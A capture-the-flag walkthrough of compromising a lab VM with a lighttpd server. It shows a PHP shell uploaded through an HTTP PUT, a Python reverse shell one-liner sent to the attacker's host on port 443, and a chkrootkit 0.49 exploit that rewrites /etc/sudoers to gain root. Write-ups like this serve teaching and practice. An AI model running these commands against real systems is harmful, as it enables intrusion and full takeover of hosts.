For the attacking machine, I will be using Kali 2017.1. Once booted, this is what the machine looks like:
We start the attack by finding the IP of the victim machine by using the netdiscover command: $ netdiscover
Now that we know our target IP, let us start by scanning the ports and try to get more information about it:
The scan shows us that the following ports are open:
Port 22 – Running OpenSSH Port 80 – Running lighttpd
Let us head over to the browser to see if we find something useful:
After going through the source code of the page, I do not find anything useful. Let us fire up dirbuster to see if the server is hiding anything from us: A quick result shows us a directory /test/ that is present:
Heading over to the directory, it is a blank directory listing.
Since dirbuster too has not come up with anything else so far, why not see what all we can do with this link? Hitting a simple cURL request to this link would be able to tell us a lot more than we know: $ curl -v -X OPTIONS http://172.16.92.137/test
Well, that interesting! As we can see, the method PUT is allowed on the URL meaning we can create a new resource: $ curl -v -X PUT -d ‘’ http://172.16.92.137/test/shell.php
The above query will create a file shell.php in /test/ directory along with the PHP code we added to get us a command line:
In addition, we have partially exploited the vulnerability! Now let us try to get a reverse shell: I will be using the following Python reverse shell (more can be found at http://pentestmonkey.net/cheat-sheet/shells/reverse-shell-cheat-sheet ): python -c ‘import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((“172.16.92.133”,443));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call([“/bin/sh”,”-i”]);’ Now let us start a listener on port 443 and send the above shell in the previous link we exploited: $ curl “http://172.16.92.137/test/shell.php?cmd=python%20-c%20%27import%20socket%2Csubprocess%2Cos%3Bs%3Dsocket.socket(socket.AF_INET%2Csocket.SOCK_STREAM)%3Bs.connect((%22172.16.92.133%22%2C443))%3Bos.dup2(s.fileno()%2C0)%3B%20os.dup2(s.fileno()%2C1)%3B%20os.dup2(s.fileno()%2C2)%3Bp%3Dsubprocess.call(%5B%22%2Fbin%2Fsh%22%2C%22-i%22%5D)%3B%27”
Note: I tried to use port 444 and 4444, but it did not work as they are blocked. Voila, we have a low privilege shell:
Now let’s explore the system and see what else is there we can exploit to become root. After some time, I stumbled upon something really interesting in /, etc./cron.daily:
cron.daily is where all the cron (automatic) jobs that need to be performed by the server on a daily basis are present, and here I can see a chkrootkit. On further examination, I see that the version of chkrootkit in question is 0.49!
After some research, it has a known vulnerability and can be exploited. I used the following exploit: https://www.exploit-db.com/exploits/33899/ $ echo ‘chmod 777 /etc/sudoers && echo “www-data ALL=NOPASSWD: ALL” » /etc/sudoers && chmod 440 /etc/sudoers’ > /tmp/update A file update would be created in /tmp/. Give that file the following permissions: $ chmod 777 /tmp/update Once done, wait for a couple of minutes and then type: $ sudo su
Now we have root! Let us head over and read the flag.
